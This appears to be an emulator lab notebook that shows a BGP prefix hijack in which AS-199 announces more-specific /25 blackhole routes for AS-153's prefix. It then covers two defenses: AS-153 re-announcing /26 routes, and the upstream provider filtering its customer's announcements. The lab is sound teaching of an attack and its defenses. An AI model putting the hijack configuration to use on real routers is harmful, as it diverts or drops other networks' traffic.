# BGP Prefix Hijacking Attack

## Environment Setup

First, let us run the emulator. 

In this lab, we use AS-199 to hijact AS-153's IP prefix `10.153.0.0/24`. To help observe the attack effect, we first ping one of the AS-153's machine. On the Internet Map, we should be able to see how the packets flow (type in `icmp` in the `Filter` field, followed by a return).

In [ ]:
%%bash --bg
docker exec as151h-host_0-10.151.0.71 ping 10.153.0.71

## 1. Hijack AS-153

Step 1: The attacker is AS-199, so we first get AS-199's BGP configuration file, and make the corresponding changes. We can use the following command to get the configuration file.

In [ ]:
!docker cp as199brd-attacker-bgp-10.199.0.254:/etc/bird/bird.conf ./as199_bird.conf

Step 2: We add the following content to AS-199's BGP configuration file. 

```
##############################################
# Added BGP Attack
# Hijack AS153's network prefix 10.153.0/24
##############################################

protocol static {
  ipv4 { table t_bgp;  };
  route 10.153.0.0/25 blackhole   {
      bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.128/25 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  };
}
```

Step 3: After finishing editing the configuration file, we copy the file back to AS-199's BGProuter, and then restart the BGP deamon for the changes to take effect. For the sake of convenience, we have already placed the modified configration in `as199brd_bird.conf_malicious`.

In [ ]:
%%bash
docker cp  as199brd_bird.conf_malicious as199brd-attacker-bgp-10.199.0.254:/etc/bird/bird.conf
docker exec as199brd-attacker-bgp-10.199.0.254 birdc configure

Step 4: From the Internet Map, we can see that the packet flow has changed, they are now going to AS-199. When we `ping 10.153.0.71` from any machine, we won't be able to get any response. Let us take a look at the router on  `as3brd-r103-10.103.0.3` (this BGP router belongs to AS-3, which is a transit autonomous system). We can see that AS-153 has three records in the rounting table. The two entries `10.153.0.0/25` and `10.153.0.128/25` completely cover `10.153.0.0/24`。From the routing entries, we can see that the next-hop router for the `10.153.0.0/25` and `10.153.0.128/25` networks is `10.3.0.254`, while the next-hop router for the `10.153.0.0/24` network is `10.3.3.253`. They are going to different directions. 

In [ ]:
!docker exec as3brd-r103-10.103.0.3 ip route

## 2. AS-153's fightback

Step 1：AS-153 can use the same technique to "hijack" its IP prefix back. It only needs to set the following entries in its BGP configuration file (also restarting the BGP daemon).

```
#########################################
# Added for BGP Attack
# Fight back
#########################################

protocol static {
  ipv4 { table t_bgp; };
  route 10.153.0.0/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.64/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.128/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.192/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
}

```

Step 2: We have already put the modified configuration in `as153brd_bird.conf_fightback`. We only need to copy it to AS-153's BGP router. After running the following commands, we should be able to see that the packet flow changes back to its original path, flowing to AS-153 now.

In [ ]:
%%bash
docker cp as153brd_bird.conf_fightback as153brd-router0-10.153.0.254:/etc/bird/bird.conf
docker exec as153brd-router0-10.153.0.254 birdc configure

## 3. Let AS-199's up-stream provider solve the problem

Step 1: Before doing this task, we first restore AS-153's configuration, so the attack is still in effect. We want to ask AS-199's up-stream provider to solve this problem. 

In [ ]:
%%bash
docker cp as153brd_bird.conf_original as153brd-router0-10.153.0.254:/etc/bird/bird.conf
docker exec as153brd-router0-10.153.0.254 birdc configure

Step 2: Let's find out who AS-199's up-stream service provider is. We run the following command to ask AS-199's BGP router to provide information.

In [ ]:
!docker exec as199brd-router0-10.199.0.254 birdc show protocols

From the result, we can see only one BGP session, which is `u_as2`; this is AS-2. This autonomous system has multiple BGP routers. From the Internet Map, we can see that AS-199 and AS-2 peer at IX-105. We can find the container name for the corresponding BGP router (`as2brd-r105-10.105.0.2`).

In [ ]:
!docker ps | grep as2

Step 3: We can get `as2brd-r105-10.105.0.2`'s BGP configuration file. We add one line to it (see the line with the comment). This line checks whether the IP prefix in AS-199's BGP announcement is `10.199.0.0/24` or not, if not, reject the BGP announcement.
```
protocol bgp c_as199 {
    ipv4 {
        table t_bgp;
        import filter {
            bgp_large_community.add(CUSTOMER_COMM);
            bgp_local_pref = 30;
            if (net != 10.199.0.0/24) then reject;  ### Block this BGP announcement 
            accept;
        };
        export all;
        next hop self;
    };
    local 10.105.0.2 as 2;
    neighbor 10.105.0.199 as 199;
}
```

Step 4: Let's copy the modified BGP file back to `as2brd-r105-10.105.0.2`. We have already saved the modified configuration in `as2brd-r105_bird.conf_fixproblem`. Run the following command, we should be able to see that the packet flow is restored, now going to AS-153 again. 

In [ ]:
%%bash
docker cp  as2brd-r105_bird.conf_fixproblem as2brd-r105-10.105.0.2:/etc/bird/bird.conf
docker exec as2brd-r105-10.105.0.2 birdc configure